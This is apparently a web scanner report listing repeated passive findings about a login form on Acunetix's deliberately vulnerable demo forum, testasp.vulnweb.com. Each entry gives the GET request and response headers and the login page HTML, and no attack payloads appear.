<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D75" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=76 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:09 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D76" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=77 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D77" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=78 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D78" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=79 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D79" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=8 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:01 GMT Content-Length: 3133 |
Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D8" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=80 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D80" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=81 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:10 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D81" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 |
Method | GET |
Parameter | |
Attack | |
Evidence | <form action="" method="POST"> |
Request Header - size: 373 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=82 Cookie: ASPSESSIONIDASSBRCRC=JKIMIJFANMHDCJBMIFNDONAD |
Request Body - size: 0 bytes. |
|
Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:00:11 GMT Content-Length: 3134 |
Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D82" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" 